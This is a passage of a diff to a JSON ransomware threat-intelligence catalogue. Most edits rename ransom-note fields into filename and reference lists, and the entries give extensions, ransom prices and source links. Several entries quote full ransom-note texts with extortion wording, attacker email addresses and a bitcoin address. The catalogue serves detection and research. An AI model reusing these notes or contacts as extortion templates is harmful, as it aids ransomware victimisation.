addresses! We will help You as soon as possible!\n\nIMPORTANT: DO NOT USE ANY PUBLIC SOFTWARE! IT MAY DAMAGE YOUR DATA FOREVER!\n\n\nDECRYPT-ID-[id] number", - "https://pbs.twimg.com/media/DuFQ4FdWoAMy7Hg.jpg", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nleab@tuta.io\n\nitprocessor@protonmail.com\n\npcambulance1@protonmail.com\n\nleablossom@yandex.com\n\nblossomlea@yandex.com\n\nleablossom@dr.com\n\nPlease send email to all email addresses! We will help You as soon as possible!\n\nIMPORTANT: DO NOT USE ANY PUBLIC SOFTWARE! IT MAY DAMAGE YOUR DATA FOREVER!\n\n\nDECRYPT-ID-[redacted lowercase GUID] number" ], + "ransomnotes-filenames": [ + "INSTRUCTION RESTORE FILE.TXT", + "# HELP_DECRYPT_YOUR_FILES #.TXT", + "_HELP_INSTRUCTION.TXT", + "C:\\ProgramData\\[random].exe" + ], + "ransomnotes-refs": [ + "https://pbs.twimg.com/media/DuFQ4FdWoAMy7Hg.jpg" + ], "refs": [ "http://www.nyxbone.com/malware/CryptoMix.html", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", @@ -6227,7 +6389,7 @@ ], "payment-method": "Bitcoin", "price": "0.5 (360$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "!Where_are_my_files!.html" ], "refs": [ @@ -6244,7 +6406,7 @@ "extensions": [ ".doomed" ], - "ransomnotes": [ + "ransomnotes-filenames": [ "LEER_INMEDIATAMENTE.txt" ], "refs": [ @@ -6263,7 +6425,7 @@ ], "payment-method": "Bitcoin", "price": "200$", - "ransomnotes": [ + "ransomnotes-filenames": [ "ATTENTION.url" ], "refs": [ @@ -6282,7 +6444,7 @@ ], "payment-method": "Bitcoin", "price": "0.5 (100$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW TO DECRYPT FILES.txt", "%Temp%\\.bmp" ], @@ -6310,7 +6472,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.09 (500$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_INSTRUCTION.HTM", "DECRYPT_INSTRUCTION.TXT", "DECRYPT_INSTRUCTION.URL", @@ -6325,7 +6487,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.09 (500$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_DECRYPT.TXT", "HELP_DECRYPT.PNG", "HELP_DECRYPT.URL", @@ -6340,7 +6502,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.09 (500$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_DECRYPT.TXT", "HELP_DECRYPT.PNG", "HELP_DECRYPT.URL", @@ -6362,7 +6524,7 @@ ], "payment-method": "Bitcoin", "price": "1.09 (500$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_YOUR_FILES.HTML", "HELP_YOUR_FILES.PNG" ] @@ -6378,7 +6540,7 @@ ], "payment-method": "Bitcoin", "price": "1.2 (500$) - 2.4", - "ransomnotes": [ + "ransomnotes-filenames": [ "de_crypt_readme.bmp, .txt, .html" ], "refs": [ @@ -6410,7 +6572,7 @@ ], "payment-method": "Bitcoin", "price": "1.2 (500$) - 2.4", - "ransomnotes": [ + "ransomnotes-filenames": [ ".txt, .html, .bmp" ], "refs": [ @@ -6486,7 +6648,7 @@ ".cry" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_FOR_DECRYPT.txt" ], "refs": [ @@ -6507,7 +6669,7 @@ ], "payment-method": "Bitcoin", "price": "0.08686 (50$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "AllFilesAreLocked .bmp", "DecryptAllFiles .txt", ".html" @@ -6547,9 +6709,11 @@ "payment-method": "Bitcoin", "price": "1", "ransomnotes": [ - "你的檔案被我們加密啦!!!.txt", "Your files encrypted by our friends !!! txt" ], + "ransomnotes-filenames": [ + "你的檔案被我們加密啦!!!.txt" + ], "refs": [ "https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool", "https://github.com/aaaddress1/my-Little-Ransomware" @@ -6595,7 +6759,7 @@ ], "payment-method": "Bitcoin", "price": "1.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ @@ -6644,7 +6808,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_YOUR_FILES.txt" ], "refs": [ @@ -6702,7 +6866,7 @@ "encryption": "AES-256 in ECB mode, Version 2-4 also RSA", "payment-method": "Bitcoin", "price": "1 - 2 - 4", - "ransomnotes": [ + "ransomnotes-filenames": [ "cryptinfo.txt", "decrypting.txt", "start.txt" @@ -6755,7 +6919,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_TO_RECURE_YOUR_FILES.txt" ], "refs": [ @@ -6777,7 +6941,7 @@ ], "payment-method": "Email", "price": "250$", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW TO DECODE FILES!!!.txt", "КАК РАСШИФРОВАТЬ ФАЙЛЫ!!!.txt" ], @@ -6809,7 +6973,7 @@ ".dxxd" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "ReadMe.TxT" ], "refs": [ @@ -6866,7 +7030,7 @@ ".locked" ], "payment-method": "Download Decryter", - "ransomnotes": [ + "ransomnotes-filenames": [ "README.txt" ], "refs": [ @@ -6905,7 +7069,7 @@ ], "payment-method": "Email", "price": "450$ - 1000$", - "ransomnotes": [ + "ransomnotes-filenames": [ "qwer.html", "qwer2.html", "locked.bmp" @@ -6923,7 +7087,7 @@ { "description": "Ransomware Coded in GO", "meta": { - "ransomnotes": [ + "ransomnotes-filenames": [ "Instructions.html" ], "refs": [ @@ -6954,7 +7118,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to recover.enc" ], "refs": [ @@ -6973,7 +7137,7 @@ ".1txt" ], "payment-method": "WebSite (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "enigma.hta", "enigma_encr.txt", "enigma_info.txt" @@ -7017,7 +7181,7 @@ ], "payment-method": "Bitcoin", "price": "1.50520802", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ ME FOR DECRYPT.txt" ], "refs": [ @@ -7053,9 +7217,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "DECRYPT_YOUR_FILES.HTML", "RESTORE-FILES![id]" ], + "ransomnotes-filenames": [ + "DECRYPT_YOUR_FILES.HTML" + ], "refs": [ "http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/" ], @@ -7073,7 +7239,7 @@ ".FenixIloveyou!!" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "Help to decrypt.txt" ], "refs": [ @@ -7122,7 +7288,7 @@ ], "payment-method": "Bitcoin", "price": "500$", - "ransomnotes": [ + "ransomnotes-filenames": [ "[random_chars]-READ_ME.html" ], "refs": [ @@ -7162,7 +7328,7 @@ "description": "Ransomware contact email safefiles32@mail.ru also as prefix in encrypted file contents", "meta": { "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "help-file-decrypt.enc", "/pronk.txt" ] @@ -7216,7 +7382,7 @@ ".dll" ], "payment-method": "No Ransom - No Descrypter", - "ransomnotes": [ + "ransomnotes-filenames": [ "fs0ciety.html", "DECRYPT_YOUR_FILES.HTML" ], @@ -7278,7 +7444,7 @@ ], "payment-method": "Bitcoin", "price": "250$", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to restore files.hta" ], "refs": [ @@ -7303,7 +7469,7 @@ ], "payment-method": "Bitcoin", "price": "0.5(190 - 250 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "UNLOCK_FILES_INSTRUCTIONS.html and .txt" ], "refs": [ @@ -7351,7 +7517,7 @@ "meta": { "payment-method": "Bitcoin", "price": "500 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "Your files have been crypted.html" ], "refs": [ @@ -7462,7 +7628,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "help_dcfile.txt" ], "refs": [ @@ -7577,7 +7743,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_DECRYPT_HYRDA_ID_[ID number].txt" ], "refs": [ @@ -7623,7 +7789,7 @@ ], "payment-method": "Bitcoin", "price": "100 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "%Temp%\\.bmp" ], "refs": [ @@ -7657,7 +7823,7 @@ ], "payment-method": "Bitcoin", "price": "50 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "Important_Read_Me.html" ], "refs": [ @@ -7673,7 +7839,7 @@ "encryption": "RC6 (files), RSA 2048 (RC6 key)", "payment-method": "Bitcoin", "price": "0.046627", - "ransomnotes": [ + "ransomnotes-filenames": [ "readme_liesmich_encryptor_raas.txt" ], "refs": [ @@ -7763,7 +7929,7 @@ ], "payment-method": "PaySafeCard", "price": "300 €", - "ransomnotes": [ + "ransomnotes-filenames": [ "Comment débloquer mes fichiers.txt", "Readme.txt" ], @@ -7793,7 +7959,7 @@ "meta": { "payment-method": "rubles", "price": "6 000", - "ransomnotes": [ + "ransomnotes-filenames": [ "How Decrypt Files.txt" ], "refs": [ @@ -7838,7 +8004,7 @@ "keybtc@inbox_com" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_YOUR_FILES.txt", "READ.txt", "readme.txt" @@ -7855,7 +8021,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.5 (500 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "how_decrypt.gif", "how_decrypt.html" ], @@ -7910,7 +8076,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "ReadMe.txt" ], "refs": [ @@ -7930,7 +8096,7 @@ ".([0-9A-Z]{20})_([0-9]{2})_([A-Z0-9]{4,5})" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "w.jpg" ], "refs": [ @@ -7953,7 +8119,7 @@ ], "payment-method": "Bitcoin", "price": "0.03", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_ALL.html" ], "refs": [ @@ -7969,7 +8135,7 @@ "meta": { "encryption": "AES-256", "payment-method": "ransom", - "ransomnotes": [ + "ransomnotes-filenames": [ "KryptoLocker_README.txt" ], "refs": [ @@ -8002,7 +8168,7 @@ ".LeChiffre" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to decrypt LeChiffre files.html" ], "refs": [ @@ -8022,7 +8188,7 @@ ], "payment-method": "Monero", "price": "50 - 500", - "ransomnotes": [ + "ransomnotes-filenames": [ "RANSOM_NOTE.txt" ], "refs": [ @@ -8071,7 +8237,7 @@ ], "payment-method": "Bitcoin", "price": "0.2 (200 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "LEAME.txt" ], "refs": [ @@ -8103,7 +8269,7 @@ ".locklock" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_ME.TXT" ], "refs": [ @@ -8140,6 +8306,10 @@ "payment-method": "Bitcoin", "price": "3 - 5 - 7", "ransomnotes": [ + "DesktopOSIRIS.(bmp|htm)", + "lukitus.bmp." + ], + "ransomnotes-filenames": [ "_Locky_recover_instructions.txt", "_Locky_recover_instructions.bmp", "_HELP_instructions.txt", @@ -8147,10 +8317,8 @@ "_HOWDO_text.html", "_WHAT_is.html", "_INSTRUCTION.html", - "DesktopOSIRIS.(bmp|htm)", "OSIRIS-[0-9]{4}.htm", - "lukitus.htm", - "lukitus.bmp." + "lukitus.htm" ], "refs": [ "http://www.bleepingcomputer.com/news/security/new-locky-version-adds-the-zepto-extension-to-encrypted-files/", @@ -8247,7 +8415,7 @@ ], "payment-method": "Bitcoin", "price": "1 - 2", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_ReadMe1.TXT", "DECRYPT_ReadMe.TXT" ], @@ -8267,7 +8435,7 @@ ], "payment-method": "Bitcoin", "price": "1.4 - 3.9", - "ransomnotes": [ + "ransomnotes-filenames": [ "_DECRYPT_INFO_[extension pattern].html" ], "refs": [ @@ -8287,7 +8455,7 @@ ], "payment-method": "Bitcoin", "price": "0.7 - 1.1", - "ransomnotes": [ + "ransomnotes-filenames": [ "!!! Readme For Decrypt !!!.txt", "ReadMeFilesDecrypt!!!.txt" ], @@ -8316,7 +8484,7 @@ "description": "Ransomware", "meta": { "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "where_are_your_files.txt", "readme_your_files_have_been_encrypted.txt" ], @@ -8360,7 +8528,7 @@ ".fuck" ], "payment-method": "Bitcoin - Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ @@ -8379,9 +8547,11 @@ "payment-method": "Bitcoin", "price": "1.9338", "ransomnotes": [ - "YOUR_FILES_ARE_ENCRYPTED.HTML", "YOUR_FILES_ARE_ENCRYPTED.TXT " ], + "ransomnotes-filenames": [ + "YOUR_FILES_ARE_ENCRYPTED.HTML" + ], "refs": [ "http://www.bleepingcomputer.com/news/security/petya-is-back-and-with-a-friend-named-mischa-ransomware/", "https://id-ransomware.blogspot.com/2016/05/petya-mischa-ransomware.html" @@ -8402,7 +8572,7 @@ ], "payment-method": "Bitcoin", "price": "1.011 (400 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ @@ -8435,9 +8605,11 @@ "payment-method": "Bitcoin", "price": "4", "ransomnotes": [ - "4-14-2016-INFECTION.TXT", "IMPORTANT.README" ], + "ransomnotes-filenames": [ + "4-14-2016-INFECTION.TXT" + ], "refs": [ "http://nyxbone.com/malware/Mobef.html", "http://researchcenter.paloaltonetworks.com/2016/07/unit42-cryptobit-another-ransomware-family-gets-an-update/", @@ -8494,7 +8666,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "decrypt explanations.html" ], "refs": [ @@ -8512,7 +8684,7 @@ "encryption": "AES-256 + RSA", "payment-method": "Bitcoin", "price": "0.1 (43 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "ATTENTION.RTF" ], "refs": [ @@ -8541,7 +8713,7 @@ ], "payment-method": "Bitcoin", "price": "0.39983 - 4", - "ransomnotes": [ + "ransomnotes-filenames": [ "Decrypted.txt" ], "refs": [ @@ -8579,7 +8751,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "!_RECOVERY_HELP_!.txt", "HELP_ME_PLEASE.txt" ], @@ -8601,7 +8773,7 @@ ], "payment-method": "Bitcoin", "price": "0.5 - 1.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "Recupere seus arquivos. Leia-me!.txt" ], "refs": [ @@ -8639,7 +8811,7 @@ ".nuclear55" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "!!_RECOVERY_instructions_!!.html", "!!_RECOVERY_instructions_!!.txt" ], @@ -8677,7 +8849,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_TO_RESTORE_FILES.txt" ], "refs": [ @@ -8699,7 +8871,7 @@ "email-[params].cbf" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "desk.bmp", "desk.jpg" ], @@ -8740,7 +8912,7 @@ ], "payment-method": "Bitcoin", "price": "100 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "how to get data.txt" ], "synonyms": [ @@ -8783,7 +8955,7 @@ ], "payment-method": "Bitcoin", "price": "0.29499335", - "ransomnotes": [ + "ransomnotes-filenames": [ "log.txt" ], "refs": [ @@ -8814,7 +8986,7 @@ ], "payment-method": "Bitcoin", "price": "0.8", - "ransomnotes": [ + "ransomnotes-filenames": [ "IMPORTANT READ ME.txt", "File Decrypt Help.html" ], @@ -8855,7 +9027,7 @@ ], "payment-method": "Bitcoin", "price": "0.25", - "ransomnotes": [ + "ransomnotes-filenames": [ "README!.txt" ], "refs": [ @@ -8887,7 +9059,7 @@ "meta": { "encryption": "Modified Salsa20", "payment-method": "Bitcoin - Website (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES_ARE_ENCRYPTED.TXT" ], "refs": [ @@ -9022,7 +9194,7 @@ "meta": { "encryption": "AES", "payment-method": "Website (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_INSTRUCTION.html" ] }, @@ -9038,10 +9210,12 @@ "payment-method": "Bitcoin", "price": "3 (1 800 $)", "ransomnotes": [ + ".*id*" + ], + "ransomnotes-filenames": [ "!_HOW_TO_RESTORE_[extension].TXT", "!_HOW_TO_RESTORE_[extension].html", "!_HOW_TO_RESTORE_*id*.txt", - ".*id*", "@_USE_TO_FIX_JJnY.txt" ], "refs": [ @@ -9082,7 +9256,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1 - 2", - "ransomnotes": [ + "ransomnotes-filenames": [ "Ransomware.txt" ], "refs": [ @@ -9101,7 +9275,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPTION INSTRUCTIONS.txt", "rtext.txt" ], @@ -9121,7 +9295,7 @@ ], "payment-method": "Bitcoin", "price": "0.39 (215 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "!!!README!!![id].rtf" ], "refs": [ @@ -9160,7 +9334,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES.url" ], "refs": [ @@ -9212,7 +9386,7 @@ "!@#$%___________%$#@.mail" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "\\fud.bmp", "\\paycrypt.bmp", "\\strongcrypt.bmp", @@ -9286,7 +9460,9 @@ "VictemKey_300_700", "VictemKey_700_2000", "VictemKey_2000_3000", - "VictemKey_3000", + "VictemKey_3000" + ], + "ransomnotes-filenames": [ "zXz.html" ], "refs": [ @@ -9350,7 +9526,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1 - 50", - "ransomnotes": [ + "ransomnotes-filenames": [ "RarVault.htm" ], "refs": [ @@ -9404,7 +9580,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "Readme.txt" ], "refs": [ @@ -9445,7 +9621,7 @@ ], "payment-method": "Bitcoin", "price": "0.2403 (100.29 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_HOW_TO_UNLOCK.TXT", "README_HOW_TO_UNLOCK.HTML" ], @@ -9563,7 +9739,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_DECRYPT_YOUR_FILES.html", "###-READ-FOR-HELLPP.html", "000-PLEASE-READ-WE-HELP.html", @@ -9627,7 +9803,7 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECRYPT_YOUR_FILES.HTML" ], "refs": [ @@ -9646,7 +9822,7 @@ ], "payment-method": "Bitcoin", "price": "6", - "ransomnotes": [ + "ransomnotes-filenames": [ "RESTORE_ALL_DATA.html" ], "refs": [ @@ -9680,7 +9856,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "!satana!.txt" ], "refs": [ @@ -9743,7 +9919,7 @@ ], "payment-method": "Bitcoin", "price": "50 - 100 - 200 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "Readme.txt" ], "refs": [ @@ -9787,7 +9963,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "文件解密帮助.txt" ], "refs": [ @@ -9820,7 +9996,7 @@ ], "payment-method": "Bitcoin", "price": "0.8", - "ransomnotes": [ + "ransomnotes-filenames": [ "_RECOVER_INSTRUCTIONS.ini" ], "refs": [ @@ -9840,7 +10016,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ @@ -9874,7 +10050,7 @@ ], "payment-method": "Bitcoin", "price": "0.66 (300 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "_HOW_TO_Decrypt.bmp" ], "refs": [ @@ -9894,7 +10070,7 @@ ], "payment-method": "Bitcoin", "price": "0.66 (300 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_Me.txt" ], "refs": [ @@ -9981,7 +10157,7 @@ "description": "Ransomware Still in development, shows FileIce survey", "meta": { "payment-method": "no ransom", - "ransomnotes": [ + "ransomnotes-filenames": [ "ThxForYurTyme.txt" ], "refs": [ @@ -10023,7 +10199,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "Como descriptografar os seus arquivos.txt" ], "refs": [ @@ -10047,7 +10223,7 @@ ".xyz" ], "payment-method": "Bitcoin", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_TO_SAVE_FILES.txt", "Howto_RESTORE_FILES.html" ], @@ -10087,7 +10263,7 @@ "meta": { "encryption": "AES-256 + ECHD + SHA1", "payment-method": "Bitcoin", - "ransomnotes": [ + "ransomnotes-filenames": [ "RECOVER<5_chars>.html", "RECOVER<5_chars>.png", "RECOVER<5_chars>.txt", @@ -10120,7 +10296,7 @@ "description": "Ransomware", "meta": { "payment-method": "Bitcoin", - "ransomnotes": [ + "ransomnotes-filenames": [ "RECOVER<5_chars>.html", "RECOVER<5_chars>.png", "RECOVER<5_chars>.txt", @@ -10154,7 +10330,7 @@ "meta": { "payment-method": "Bitcoin", "price": "1.25", - "ransomnotes": [ + "ransomnotes-filenames": [ "HELP_DECRYPT.HTML" ] }, @@ -10171,7 +10347,7 @@ ], "payment-method": "Bitcoin", "price": "4.081", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_TO_RESTORE_FILES.html", "DECRYPT_INSTRUCTIONS.html", "DESIFROVANI_POKYNY.html", @@ -10226,7 +10402,7 @@ "meta": { "payment-method": "Bitcoin", "price": "100 - 150 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "Payment_Instructions.jpg" ], "refs": [ @@ -10245,7 +10421,7 @@ ], "payment-method": "Bitcoin", "price": "0.23", - "ransomnotes": [ + "ransomnotes-filenames": [ "tox.html" ], "refs": [ @@ -10262,7 +10438,7 @@ ".braincrypt" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "!!! HOW TO DECRYPT FILES !!!.txt" ], "refs": [ @@ -10290,7 +10466,7 @@ ".no_more_ransom" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "README.txt", "nomoreransom_note_original.txt" ], @@ -10345,7 +10521,7 @@ ], "payment-method": "Bitcoin", "price": "2", - "ransomnotes": [ + "ransomnotes-filenames": [ "DOSYALARINIZA ULAŞMAK İÇİN AÇINIZ.html" ], "refs": [ @@ -10363,7 +10539,7 @@ "umbrecrypt_ID_[VICTIMID]" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_DECRYPT_UMBRE_ID_[victim_id].jpg", "README_DECRYPT_UMBRE_ID_[victim_id].txt", "default32643264.bmp", @@ -10382,7 +10558,7 @@ "meta": { "payment-method": "Website", "price": "0.18", - "ransomnotes": [ + "ransomnotes-filenames": [ "Files encrypted.txt" ], "refs": [ @@ -10404,7 +10580,7 @@ ], "payment-method": "Website", "price": "2.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "READTHISNOW!!!.txt", "Hellothere.txt", "YOUGOTHACKED.TXT" @@ -10424,7 +10600,7 @@ ".CCCRRRPPP" ], "payment-method": "Website", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_ME_!.txt" ], "refs": [ @@ -10458,7 +10634,7 @@ ], "payment-method": "Bitcoin", "price": "0.438", - "ransomnotes": [ + "ransomnotes-filenames": [ "VAULT.txt", "xort.txt", "trun.txt", @@ -10508,7 +10684,7 @@ ], "payment-method": "Bitcoin", "price": "0.15 (100 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "ReadMe.txt" ], "refs": [ @@ -10550,7 +10726,7 @@ ], "payment-method": "Bitcoin", "price": "2.5 - 3", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to decrypt your data.txt" ], "refs": [ @@ -10574,7 +10750,7 @@ ], "payment-method": "Bitcoin", "price": "299 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_TO_UNLOCK_FILES_README_().txt" ], "refs": [ @@ -10605,8 +10781,10 @@ ], "payment-method": "Bitcoin", "price": "0.8", - "ransomnotes": [ - "HOW TO DECRYPT FILES.TXT", + "ransomnotes-filenames": [ + "HOW TO DECRYPT FILES.TXT" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/Dfj9G_2XkAE0ZS2.jpg", "https://pbs.twimg.com/media/Dfj9H66WkAEHazN.jpg" ], @@ -10672,7 +10850,7 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ + "ransomnotes-filenames": [ "how.txt" ], "refs": [ @@ -10721,7 +10899,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "Take_Seriously (Your saving grace).txt" ], "refs": [ @@ -10790,7 +10968,7 @@ ], "payment-method": "Bitcoin", "price": "1.82 - 2.036", - "ransomnotes": [ + "ransomnotes-filenames": [ "WallpapeR.bmp", "ReadMe.bmp", "ReadMe.html", @@ -10823,7 +11001,7 @@ ], "payment-method": "Bitcoin", "price": "0.122", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECODE_FILES.txt" ], "refs": [ @@ -10841,7 +11019,7 @@ ".pr0tect" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "http://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/06/SOREBRECT-3.jpg" ], "refs": [ @@ -10859,7 +11037,7 @@ ], "payment-method": "PaySafeCard", "price": "50 €", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2017/august/25/DHvA8CDWAAIR5er.jpg" ], "refs": [ @@ -10877,7 +11055,7 @@ ".OXR" ], "payment-method": "Bitcoin Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2017/august/25/DHvDae7XoAE9usO[1].jpg" ], "refs": [ @@ -10895,7 +11073,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2017/august/25/DHvM552WsAAuDbi[1].jpg" ], "refs": [ @@ -10928,7 +11106,7 @@ ], "payment-method": "Bitcoin", "price": "250 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2017/august/25/DH5KChhXsAADOIu[1].jpg" ], "refs": [ @@ -10944,7 +11122,7 @@ "meta": { "payment-method": "Bitcoin", "price": "2 100 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "RESTORE_INFO-[id].txt" ], "refs": [ @@ -10976,7 +11154,7 @@ ], "payment-method": "Bitcoin", "price": "0.1", - "ransomnotes": [ + "ransomnotes-filenames": [ "readme.html", "readme.png" ], @@ -11055,9 +11233,11 @@ "payment-method": "Bitcoin", "price": "0.2 - 0.4 - 2", "ransomnotes": [ - "_READ_ME_FOR_DECRYPT.txt", "Warning\n\nYour documents, photos,databases,important files have been encrypted by RSA-4096 and AES-256!\nIf you modify any file, it may cause make you cannot decrypt!!!\n\nDon't waste your precious time to try decrypt the files.\nIf there is no key that we provide to you , NO ONE can decrypt your precious files, even Jesus.\n\nHow to decrypt your files ?\n\nYou have to pay for decryption in bitcoin\nTo decrypt your files,please following the steps below\n\n1,Pay 2.0 bitcoin to this address: [bitcoin_address]\n\nPay To : [bitcoin_address]\nAmount : 2.0\n\n2,After you have finished paying,Contact us and Send us your Decrypt-ID via email\n\n3,Once we have confimed your deal,You can use the tool we sent to you to decrypt all your files.\n\nHow to obtain bitcoin ?\n\nThe easiest way to buy bitcoin is LocalBitcoins site.\nYou have to register, click Buy bitcoins and select the seller\nby payment method and price\n\nhttps://localbitcoins.com/buy_bitcoins\n\nhttps://paxful.com/buy-bitcoin\n\nhttp://bitcointalk.org/\n\n If you have any questions please do not hesitate to contact us\n\nContact Email:JeanRenoAParis@protonmail.com\n\nDecrypt-ID:" ], + "ransomnotes-filenames": [ + "_READ_ME_FOR_DECRYPT.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/", "https://id-ransomware.blogspot.com/2017/11/storagecrypter.html" @@ -11075,9 +11255,11 @@ "payment-method": "Bitcoin", "price": "500 - 700 $", "ransomnotes": [ - "RECOVERY.txt", "ALL YOUR FILES WERE ENCRYPTED.\nTO RESTORE THIS FILE, YOU MUST SEND $700 BTC for MASCHINE\nOR $5,000 BTC FOR ALL NETWORK\nADDRESS: 15aM71TGtRZRrY97vdGcDEZeJYBWZhf4FP\nAFTER PAYMENT SENT EMAIL m4zn0v@keemail.me\nALONG WITH YOUR IDENTITY: VVNFUi1QQzA5\nNOT TO TURN OFF YOUR COMPUTER, UNLESS IT WILL BREAK" ], + "ransomnotes-filenames": [ + "RECOVERY.txt" + ], "refs": [ 